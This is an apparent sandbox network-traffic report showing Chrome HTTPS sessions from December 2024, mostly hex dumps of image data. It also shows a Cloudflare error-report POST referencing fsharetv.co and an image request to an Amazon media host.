                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 55 6a ca de f0 34 d7 47 04 e4 55 0c 6d d1 d5 6a ba 2c ee aa ac b4 d3 b9 83 57 e3 ea 4d 47 3a 4b 3f 62 1e 1a 4a 3d 2f 2b 78 d9 6b 28 66 3d 3e c6 bb 69 d2 b1 63 de bf 82 2f f8 0a 76 bb e1 60 8e 9a 3c 10 95 23 6f 20 64 a4 cb d9 0a 46 bb 67 24 1b ce a4 59 54 91 1c 99 11 9c e4 21 54 22 88 b1 98 21 81 60 f2 72 3a 0c 95 1c 64 28 1c 17 96 65 28 a4 4e 1d 81 57 5f 23 46 d9 f7 9a c3 2c 35 cb ef bb 89 6d 17 7e 7b 09 dd 7a 54 ac f1 18 b3 ba b4 e7 3e 3d ef 43 e2 5a ad ef 16 f2 3e f4 2d 96 f7 80 75 d7 bd 0f 29 fb c5 7e 73 ef 15 f7 3e f2 97 bf 3d e9 1d 23 ef 43 2d 07 ef 03 ca fe f2 37 88 fd e7 46 e5 1e f4 77 dd fb d5 da 70 db de e2 7a 5a ad 8f bd d7 f3 d1 b7 e7 bd 4e 88 fb 27 de cb d0 ff c4 00 32 10 00 02 01 04 01 03 03 03 03 04 02 02 03 00 00 00 01 02 03 00 04 11 12 05
                                                                                                                                                                                          Data Ascii: Uj4GUmj,WMG:K?bJ=/+xk(f=>ic/v`<#o dFg$YT!T"!`r:d(e(NW_#F,5m~{zT>=CZ>-u)~s>=#C-7FwpzZN'2
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 8f 16 b1 83 24 7c 6d a7 b7 4a e5 6c cc c5 35 b2 b1 36 ca 45 5f c4 b1 93 9f 5b 78 0c ac 00 8e 3e 9a 85 18 a1 f4 6e 70 a0 de 4a f7 52 81 53 4c f2 eb bd b5 89 ba 54 d2 dd fd bc c0 90 b9 8d f1 48 c5 08 61 c6 72 3d 7f cf 50 6b 92 e2 7a 79 78 8a e2 a2 88 c8 ca 8a 8b 1a f5 03 85 a1 1c 92 c0 2a 08 77 3d df 44 dc 47 1c 0b 6f 16 1c b4 33 00 1e 6e 0f 39 61 14 d2 58 48 d8 4e 76 4c fc e0 e5 62 b9 6d 6b b9 ac 05 a9 b2 54 eb 33 ee 7d 6c ac 1e ec fc 6d 2d 12 d5 35 5f ab 24 80 2a da 09 2e 9d b5 42 06 73 ee dd a1 10 55 ca f4 7e c5 34 9d 43 84 e9 92 0b 0f b5 87 a4 25 48 23 8b bd dc 9d f1 fc 72 5c 59 61 d4 41 09 fd ec 38 d8 ee 50 e4 db 94 f3 dd 8b 2c 42 41 3f c2 ac 60 4f 8b 36 92 47 ae 92 5d 2a fc 6e 7a 4d 6e 04 b6 bc 9d 9c 73 23 49 1d 03 8f 1c 4d db 5c a9 07 2a 2b 90 e5 53
                                                                                                                                                                                          Data Ascii: $|mJl56E_[x>npJRSLTHar=Pkzyx*w=DGo3n9aXHNvLbmkT3}lm-5_$*.BsU~4C%H#r\YaA8P,BA?`O6G]*nzMns#IM\*+S
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: bc c7 df 78 ad 95 cb 1d 8b aa 9c 13 50 47 bb 76 86 d0 ca ee 03 a8 8c 14 68 5b e0 b5 b5 67 e8 e3 1f 49 76 a3 3e f1 a3 c7 1c e9 2f f6 f8 99 da 66 72 6f 10 c6 14 a4 da 48 7e cc 13 b5 ab e1 fd fa 8d 0d 4b 29 91 f1 2a 85 90 81 4d 14 5f 88 e9 84 4c 55 ad 9c 76 8c 45 47 26 dd 8b 30 c6 f5 9e ed 4a 76 5f 8a 00 46 28 53 0d 81 53 37 05 04 9d d4 7f c7 9b 6e f6 96 3e d4 50 f4 f1 5c a4 b1 b3 30 72 63 07 04 7c 82 ad 5b 5b 92 15 ea e1 64 8d 71 48 42 88 fa b6 ac 41 30 92 71 d8 ab 50 f5 e2 ed c5 c4 ba b9 f8 80 15 b2 d5 6a 8a 8b 91 25 bf d8 53 57 29 f7 d0 99 ee e5 f9 a5 41 71 27 78 d1 25 3f e4 11 58 82 05 b6 ea ba 81 af 54 ab cf 8c 1a 18 66 44 a8 db 7c 9a 4a 3f ed 30 c3 fa 1c a7 2a ee 5a 14 7b a9 25 7c d3 c8 8f da 92 00 40 50 f1 35 af dc 8a 6b c1 2c 65 8d 84 9b 1e 93 89 46
                                                                                                                                                                                          Data Ascii: xPGvh[gIv>/froH~K)*M_LUvEG&0Jv_F(SS7n>P\0rc|[[dqHBA0qPj%SW)Aq'x%?XTfD|J?0*Z{%|@P5k,eF
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: 2b fb c5 4d 72 d3 ec 56 21 32 b5 c4 9b d6 4c ff 00 94 71 ae 7a 67 a1 a0 cb 58 dc 18 ee 04 8f 7c 14 61 28 2e fc 7f 60 f8 14 64 24 6b eb 06 81 81 79 2f 0b 54 73 4a da 6b 6c 12 60 f0 98 38 f8 95 8d 19 7a 07 02 70 1d 4d 32 77 38 b7 9a 33 3a e1 b4 05 a4 68 a7 59 c5 39 e9 62 8b 95 61 aa 6e e8 4a b4 9f 6d ab 68 be 2c 51 d1 32 4b c6 a2 1a 67 1d b2 7e e8 34 d0 8d 32 54 88 f5 35 65 73 f9 25 2b 1f 14 67 3b 30 2b 32 eb f1 92 23 b6 4a da 4b b2 bd 43 c5 49 2a 22 b2 da fb 25 17 2c 6e 98 cb d4 a1 21 47 dd 64 7d f1 5c 65 c0 11 b2 b5 d4 62 29 1d 05 1a f3 da bd be f8 35 0c 08 98 c1 11 c4 19 6a 0b 9e 99 ea 53 b6 d8 95 2f 63 ea 06 35 ef 22 45 c1 8f 99 64 ec 2d 60 8e 49 75 22 d2 1a 58 93 50 a2 28 10 e9 ad cc 3d 3c 61 14 32 fc d9 14 c6 c6 27 84 6e 42 81 a6 58 71 d9 3b 83 71 04
                                                                                                                                                                                          Data Ascii: +MrV!2LqzgX|a(.`d$ky/TsJkl`8zpM2w83:hY9banJmh,Q2Kg~42T5es%+g;0+2#JKCI*"%,n!Gd}\eb)5jS/c5"Ed-`Iu"XP(=<a2'nBXq;q
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: 3c d7 e4 6a c2 c9 6e 58 8a 85 16 11 ac 7b 7f 32 95 23 0d 75 6b ed 4e f0 88 f7 14 90 54 76 ff 00 bd 41 6f d8 1a 9d 30 0d 49 09 90 e6 bd b5 2c 0c a4 32 c7 1c 98 f9 ca b3 f6 0b 2c 12 c8 ad 90 f2 58 00 0c 9c 80 71 a9 92 4c 92 48 75 15 c5 90 c2 53 4e 85 30 1c fc 4e 6a 43 d4 0d 56 a7 38 c3 f7 5d 68 91 53 db b3 21 14 54 8e c6 ad f6 a9 81 ed 41 24 61 a5 24 4c df 90 39 c0 a5 b5 33 0e c3 88 44 5e f7 36 bd 03 81 c5 27 4e dd 29 ce 3b 56 75 ed 52 1d 46 6a e6 4d a8 7d a3 9a 88 24 bd d0 24 60 6c d1 f2 68 cd a9 92 fe 0a fd 4c 6e 73 6d 3c 17 1d 94 45 40 62 9e 11 27 e7 25 b6 3c 4d 3b a1 21 24 99 df f2 6f 4e 35 16 34 19 d6 46 6a 68 8b 76 33 db 24 48 4d 58 c8 0c 92 21 b8 4c 7c c3 cc 15 f6 a8 55 cc 65 9d 86 09 14 9c 6e 68 71 db a8 55 fd 31 49 cb 2c 28 83 14 2c 13 bd 2d b4 4a
                                                                                                                                                                                          Data Ascii: <jnX{2#ukNTvAo0I,2,XqLHuSN0NjCV8]hS!TA$a$L93D^6'N);VuRFjM}$$`lhLnsm<E@b'%<M;!$oN54Fjhv3$HMX!L|UenhqU1I,(,-J
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: 76 63 f2 5a f2 39 8a 36 60 c0 15 b3 f8 3c 21 b1 76 5d 5f 8b 74 40 23 2b 1a 25 6e 9b fa f5 fb 1f c3 8e 30 59 e4 dc e0 eb 67 6f 69 6c 11 3c ad ff 00 18 da de 6f fc 2d 67 f0 15 12 1c d3 f0 c7 58 fc 92 3f de 57 e3 2e b0 90 75 14 f3 23 95 65 75 71 c9 72 ab 0b 64 b2 19 e5 e0 36 74 93 69 69 7e 3d ed 66 f9 08 df 91 27 fe 46 78 d3 24 d2 c9 33 e1 6e 3f 9d 64 ba 82 41 88 c7 9d b0 36 a0 92 32 79 88 22 25 4f 86 35 11 3b 41 5c 40 66 00 1b 97 4d a6 9d 8c 3a da d1 eb a7 18 cc c4 67 c8 1b d5 7a af c0 63 42 a2 9b 22 d9 f8 da f2 79 63 66 e7 1e ba 09 03 ca cd ac 63 b2 b3 ee cb 0c 61 23 46 d8 3d cc 9a c8 3b 23 2b aa c5 14 f9 5e b7 3c dc 9a b2 2c 4b a1 e6 e7 d9 98 c7 25 e5 fa 07 1d c8 2a 44 da ec 47 38 ef 62 58 c8 7d 7d c4 60 23 c9 f6 51 54 e6 bc f1 ce bc d6 62 08 ac 87 95 51
                                                                                                                                                                                          Data Ascii: vcZ96`<!v]_t@#+%n0Ygoil<o-gX?W.u#euqrd6tii~=f'Fx$3n?dA62y"%O5;A\@fM:gzcB"ycfca#F=;#+^<,K%*DG8bX}}`#QTbQ
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: 0c 15 1f bd 84 4d fc c5 3f d8 ad 65 7a fe df 22 dd 4e a2 d3 cb e9 ad db bd 91 48 ca b6 d1 f8 06 c4 35 02 a1 8f 50 c4 72 3d c3 78 3d f6 6f 1d bc 8c 41 45 47 99 b1 41 cc 4a b9 ef d8 35 4a 58 cb 35 41 c6 c4 40 76 c0 7f 15 b3 1e 5d 11 94 63 04 1c 1c 40 93 b7 16 80 13 71 52 6a f2 1e ab 06 d8 40 db b2 5e e1 6b 0b d0 26 60 38 99 fc 31 31 11 ca e4 46 af 00 60 98 0c ae ac 82 49 a9 cf f6 56 b7 f0 c4 aa 33 10 15 74 b6 15 1b ac a1 d9 be 69 a1 57 38 16 69 1e 93 86 99 84 74 c7 4c 4f 11 ae 3f a4 b3 4e 6c 4c 4d 3d 76 2a ed b6 cb 99 48 55 af 50 b6 e0 37 b7 4b 1c 39 d3 68 e8 03 72 6a 7d 67 50 e4 a2 33 91 c9 5b b2 43 0b df 75 00 f5 f6 cb 69 2c 2e d2 aa 2e 56 6d 98 98 9b 11 94 83 a7 d5 2a 13 5d a0 69 6b b4 6c d4 fa 63 d5 f3 14 e9 c8 3b 9a d5 74 61 bb d3 eb b1 5c b8 d7 8a 4d
                                                                                                                                                                                          Data Ascii: M?ez"NH5Pr=x=oAEGAJ5JX5A@v]c@qRj@^k&`811F`IV3tiW8itLO?NlLM=v*HUP7K9hrj}gP3[Cui,..Vm*]iklc;ta\M
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: 04 79 04 5f 35 d6 08 3e 3b 56 aa 78 99 4d 09 a8 7c d4 23 f9 9c 56 b9 ca 43 8a 36 3f 4a 2e 57 cb e4 5b e1 3f 89 07 fb a1 da 3e 22 cf 73 22 57 3e cf 0f 5c 94 00 f2 ed 0e 2f cd 41 3d ab 92 e1 8a 81 f4 d1 43 a3 69 9a c5 c9 6b c6 d3 2e 5b cc 4b cd 40 65 e3 26 26 e2 25 e4 8b c0 0c 8f c5 10 0a 0d e7 a7 51 4b 0a 0e 08 a3 d9 74 71 7b fc 27 76 2a fa e8 fd b0 d9 f0 50 57 e0 b9 5e a4 45 de bd 90 9b 3b 2a a0 3f b4 ad 1c 43 36 74 09 26 81 8a 84 ce f6 5a f8 43 0c df d8 28 db 4a 61 9c 4e 43 1f d1 20 c3 05 fc 4d 23 5d 0c a7 79 bb 72 82 2f da 54 07 f6 95 09 1b 90 e2 8b 6c ea 5b 50 fe ab be aa 2e 3d 49 07 2a 21 0e f5 1b aa 9b 95 ca e0 39 cf e2 2d e4 53 41 a6 bc 1b fa c5 06 3d 8e f7 c9 43 cd 42 9b 82 3e 9d bc 14 76 0c 24 b6 c3 34 5c 1b d4 62 17 c4 b2 d3 40 4c 2d 14 3a c0 ce
                                                                                                                                                                                          Data Ascii: y_5>;VxM|#VC6?J.W[?>"s"W>\/A=Cik.[K@e&&%QKtq{'v*PW^E;*?C6t&ZC(JaNC M#]yr/Tl[P.=I*!9-SA=CB>v$4\b@L-:


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          73192.168.2.164980535.190.80.14436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:08 UTC474OUTPOST /report/v4?s=J%2BfTEyXCZr2lOhfmsOa81sbl01xyWqPm8jMCnozW8rp8mR1Ziu3SpaLYBIwaI1U1ffkcFEYNBbZE1s5DZV2DNH4WAB7A6cAGI8hgDKuWnjUc4ut8Uw33%2F3ecXi7oXQ%3D%3D HTTP/1.1
                                                                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Content-Length: 405
                                                                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:08 UTC405OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 31 38 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 66 73 68 61 72 65 74 76 2e 63 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 30 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74
                                                                                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":3187,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://fsharetv.co/","sampling_fraction":1.0,"server_ip":"104.21.10.158","status_code":404,"type":"http.error"},"type":"network-error","url":"htt
                                                                                                                                                                                          2024-12-15 11:38:09 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          date: Sun, 15 Dec 2024 11:38:08 GMT
                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          Connection: close


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          74192.168.2.1649806151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:08 UTC644OUTGET /images/M/MV5BNDU4MjYwMjg1OF5BMl5BanBnXkFtZTcwNjEwMDUyMQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:09 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 27557
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 1f875457-07f4-4ce2-a3e5-5812b2211bbf
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Fri, 14 Mar 2008 18:29:54 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Mon, 05 Dec 2044 07:23:31 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 423473
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:09 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100063-IAD, cache-ewr-kewr1740060-EWR
                                                                                                                                                                                          X-Cache: MISS from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 b2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 04 07 02 03 08 00 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 00 01 02 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 a6 db ab 99 0f 57 44 4d e7 b9 e9 f4
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6WDM
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: fb b5 8b 7a 2d e9 8f 3a 00 4c 20 00 24 12 55 8f 0b 5a bb cb 5e 81 d4 4a de 02 2e c6 84 78 58 98 c5 5c 41 a5 40 2c a8 5b 01 82 9e 85 2a e3 af 12 fc 51 9f fb f6 1e aa d2 e9 1e 06 34 0d 75 15 15 79 5a c5 17 1d 56 56 f2 3b 42 ae f2 f9 23 79 bf fa 5a a0 b8 b8 fd 40 12 b4 b4 0f 7c a7 5c f7 ed 3c c2 f4 bf 58 a2 db 18 d4 a8 b3 62 00 e9 f5 db bd 6c 4a 5e b4 2a 6e 98 d6 7e 51 5d 3d 48 b0 0a 59 76 ca 5b eb 22 81 a6 c7 20 65 b4 2e 74 5a a7 13 ad a4 b6 b8 88 37 59 55 37 52 73 ca d6 1b 3e c0 79 56 e7 3a 97 70 89 d0 80 2b 9b 09 53 ac ee b5 d8 c4 45 75 db 21 6b a7 cd e6 c6 07 63 6b 34 ff 00 6a d5 cd c8 b9 1c c3 3c 1c e9 94 7e 51 b3 26 cc 11 ba 42 5a 22 ee ba 8b 5f bf 25 ea 0e b4 2a 3b 5a a9 b1 60 e2 f4 cd 34 b6 f0 8f d8 4f 53 b8 05 f1 5d a0 da 98 4b 98 f3 7d 68 c7 61 e6
                                                                                                                                                                                          Data Ascii: z-:L $UZ^J.xX\A@,[*Q4uyZVV;B#yZ@|\<XblJ^*n~Q]=HYv[" e.tZ7YU7Rs>yV:p+SEu!kck4j<~Q&BZ"_%*;Z`4OS]K}ha
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: ac 24 f1 91 a4 b5 4b 6d 73 dd d3 87 cc 40 5d 9c e3 d2 08 27 0f 35 10 40 1d d1 55 c0 b0 22 59 31 4a f2 ce 27 c9 f5 d0 0e 6a 90 23 61 e8 f2 25 e7 f2 06 9a ce 5a 34 c4 d5 c8 98 07 3b a7 1c 60 e1 05 b7 54 78 d7 73 f4 c1 d7 2e f9 2c a0 f1 de f0 59 90 53 23 9d 33 05 56 60 96 6f 25 06 3b a2 d0 e1 4c 90 3c f9 31 16 3b 07 b7 7c e7 bb b7 0c fd bc 70 95 4b db bc 86 f2 92 2e b8 e4 f9 de a7 1f 65 9a fd 1d 7b b1 f4 ad 98 67 06 4c 07 fd 0d ba 95 9e bf b7 70 f4 c6 c0 98 6d fb 03 60 e7 cd 71 31 bd 48 d1 a7 ec d5 de c0 a9 97 7b e7 76 16 ca e3 65 6d e6 2a cc 8a 86 d8 d2 8c 5d 31 69 8f 2a af 3f 7c f9 9d 1f fa 3b 7f 27 a5 33 28 74 ed 16 c0 e5 19 0d 15 d7 1c 50 7a f6 1e 6d cd 31 c3 36 43 58 9f 55 91 17 80 ed 54 0f a1 c9 13 33 b2 8d f7 3a 5b 9a be 58 e0 63 d7 ac 40 8f 32 48 b2
                                                                                                                                                                                          Data Ascii: $Kms@]'5@U"Y1J'j#a%Z4;`Txs.,YS#3V`o%;L<1;|pK.e{gLpm`q1H{vem*]1i*?|;'3(tPzm16CXUT3:[Xc@2H
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: b5 6a 92 e1 60 1b 9e 91 ec b8 34 d4 eb d3 4e b8 5d b7 52 d4 af 06 d5 d4 96 bf 58 ea 1b 55 a8 52 b5 26 d1 6d 7e 7f 57 42 39 2a 69 4e e4 dd 56 b7 46 9a 4e 2e c0 5b 6a 87 ad f5 ba ba dc a3 68 03 5b d4 69 a9 af db fa b4 20 4c 8a 50 d9 b8 f6 67 d2 5a 83 2c 34 b6 9c 30 7d dc 7b 95 eb 01 79 63 6f d4 56 88 43 6e ec af 7a 95 a8 64 24 da 41 1a 87 ce ef f0 ac 54 0c 1c c0 25 77 f0 12 ad 4e 3c fd 48 82 e1 06 9d e7 45 c4 5d 33 4b 9d 74 a3 df 46 bf de 2d b9 75 2f ae ad b8 69 b6 fa ef b5 90 a6 cd 4d 20 b4 db ee 16 59 71 6d bf 72 1a bb 38 0d 55 cd 55 36 32 e9 f5 6f a9 4b cb 69 3e 1a a6 e4 57 ea 88 6b 2b e2 9d 31 b5 8c 75 a6 f9 f1 57 34 3f 05 53 76 38 d4 2c da bf f6 9b df c0 b3 4b 60 ad 95 8e d1 f2 cd c3 f8 f6 cd 94 e6 bb 26 f5 81 d3 b2 6d d5 0b 4b 3b 6e f7 9a 92 b0 b4 52
                                                                                                                                                                                          Data Ascii: j`4N]RXUR&m~WB9*iNVFN.[jh[i LPgZ,40}{ycoVCnzd$AT%wN<HE]3KtF-u/iM Yqmr8UU62oKi>Wk+1uW4?Sv8,K`&mK;nR
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 53 4d 39 56 df 17 92 50 62 a2 cc 4d 7a f1 b9 fd 19 cb 79 fc c2 21 95 31 fb 69 4c 56 87 bc 31 a3 2c d3 1c 11 35 98 e7 c6 2a 29 56 22 aa c5 99 33 50 e1 0f 15 e6 e7 c7 2b 1b c6 df a4 b4 97 0c bb 7b 81 2e b9 34 fe c0 c0 dd ee 8f a7 c7 75 0b ca 74 3b f7 7d 20 11 b4 98 11 50 66 5b 63 54 0a 8a 9a 72 9a d1 fb 5b ff 00 a0 09 88 b2 b6 c4 a5 e5 2d e8 c2 11 18 44 6c 4b 97 a9 83 34 b4 d4 8a 54 fd 25 3f 6d 46 cc 6f 9a 7d b6 ba 94 08 6a 69 f4 c5 8f 23 7e bb a4 bc 16 bb 52 75 55 fb 46 b0 a7 95 d6 28 8f ad c7 81 b8 29 f2 86 9b 33 06 84 34 be 84 4f dc 2c 00 12 06 b0 4b 87 3a bf 38 19 9d 87 81 17 bc 45 9a 7a 98 ca ab c7 a1 86 18 1a 59 7f 25 cc ae aa af 55 78 fa 4a c6 71 dd 46 07 27 3e 07 52 5d 6f 01 c4 33 13 03 60 76 16 41 ab 64 f3 73 25 9d c3 1e 30 b1 8b a9 22 69 b7 33 51
                                                                                                                                                                                          Data Ascii: SM9VPbMzy!1iLV1,5*)V"3P+{.4ut;} Pf[cTr[-DlK4T%?mFo}ji#~RuUF()34O,K:8EzY%UxJqF'>R]o3`vAds%0"i3Q
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 5b b6 a3 82 e9 a1 ec 19 a6 b1 9a cb 09 6d 0d bc 87 12 89 88 c7 04 42 73 1a 62 54 e1 0f 7e 7c d8 c5 5f cc 61 99 8b 3a 45 4e 66 f3 a9 61 8a ce 98 2d ac 59 97 52 39 9c d9 6f b8 e1 2d c0 ee c5 db b8 47 29 09 c8 8a 7b 40 63 b7 12 0c 07 3f 91 0f b9 8c b1 c5 6b 92 7e 31 2f d2 8b 04 a6 82 be 2b bc 15 cc 52 6c ef 02 e2 39 85 a7 99 e2 25 e2 73 13 94 cc cc cc 2d 0b 41 2a b4 64 82 cc 26 f9 5f 5b 05 7a 65 21 0d 99 d3 2b e4 db 30 4c c3 4a dc af 63 d4 00 41 60 3e 1c ca 2c 03 d9 f9 29 bd 91 ec 13 76 d5 0e 92 00 fd d1 62 37 68 c3 ef 35 b5 9c 65 74 f6 bf 01 c8 5c 4c 6c 9f 3c 66 7d 17 d3 30 d8 44 eb 34 eb 99 c9 9a 25 46 70 86 a5 fb da d5 81 2e b9 7b f1 70 18 42 9f fe 4b 38 18 9d 2e 50 28 1e 72 61 c8 9c f0 70 51 8a 18 6d ca 98 8c 2d ee 32 e9 e1 35 21 bb 40 67 4c 38 cc 6d 3f
                                                                                                                                                                                          Data Ascii: [mBsbT~|_a:ENfa-YR9o-G){@c?k~1/+Rl9%s-A*d&_[ze!+0LJcA`>,)vb7h5et\Ll<f}0D4%Fp.{pBK8.P(rapQm-25!@gL8m?
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 31 9a 0f 42 66 a1 bc 09 5c 12 c3 33 f9 01 f4 e0 b3 a6 b3 a4 b3 80 80 e2 06 80 fe 40 66 66 66 af 59 cc f0 4a 8e 6e 8e bc e5 2f 9f 69 ba b2 a7 2a 9a 8e 1d 98 1e 5d e6 71 da 13 0c 2d 33 07 da 03 0c d4 1e f2 98 b2 c6 f7 40 73 f9 17 f3 88 b0 7a af a6 a7 e3 69 5f 93 2a f9 bd 2b f9 0c be 6a 3c 4a 3c 4f ef d0 cb 22 fa 0f 4b bc ca 20 96 79 31 3c 7a 0f 4f ff c4 00 2e 11 00 02 02 02 02 01 03 03 04 01 04 03 00 00 00 00 01 02 00 03 04 11 05 12 21 10 13 31 06 14 41 15 20 22 32 25 16 34 51 61 23 26 30 ff da 00 08 01 02 01 01 08 00 7c 04 7f 31 b1 08 24 37 b5 1a c0 17 c7 c8 d9 50 14 86 8d 63 3a 91 13 1d 3d b2 c7 49 5a 86 53 98 09 f1 f7 c4 88 f7 7c 08 cc 06 e3 a0 d1 32 ce 3b b2 06 9f a4 d6 18 13 75 3e d9 00 35 8c 20 aa 3d fd 63 d9 da 64 72 b5 e3 3d 55 b5 9c 8a d2 b6 58 f7
                                                                                                                                                                                          Data Ascii: 1Bf\3@fffYJn/i*]q-3@szi_*+j<J<O"K y1<zO.!1A "2%4Qa#&0|1$7Pc:=IZS|2;u>5 =cdr=UX
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 07 ba c6 d1 33 51 57 62 52 83 db 82 85 10 63 eb d1 f9 02 96 15 66 e5 80 f8 ab 35 2c fd fa 06 1c 6a cc c9 c2 f6 cf 61 bf 41 ff 00 55 57 b1 02 19 b3 e9 93 8a 1f cc d1 52 43 0d af f2 4c 7c bf 71 40 3e 81 09 84 7e cc 9d fb 50 43 15 bc 44 c9 64 f3 17 39 49 f2 19 48 df a5 b5 97 5d 0b 03 2b 74 b0 12 0c ae f3 5b 86 09 68 71 d8 4a ce 87 9b 32 2a 3f 00 16 1b 58 04 7a 83 29 11 d0 f6 21 7d b0 3f b7 b8 07 c6 d8 c5 a8 4f 6b d6 fc 41 62 18 50 af 89 bf c1 a2 e2 ba 07 7f 98 19 3a 1d 9f 93 28 29 ed 80 c5 10 fc 15 f3 1a f5 4f 9b f2 3b 3f f0 d4 f6 d8 c5 48 0c ef fb 32 71 7a b7 68 ca 47 83 55 fd 7c 14 c9 2d e2 76 f1 02 cf fa 07 6a 75 2c cc d7 80 ee cc 76 4c ed 16 c9 b9 da 76 fd 8f 50 74 2a 5a 92 0f 56 6a 75 e4 25 9d 40 94 85 78 42 eb 50 28 03 73 23 33 6c 51 4f 8f 26 13 eb b9
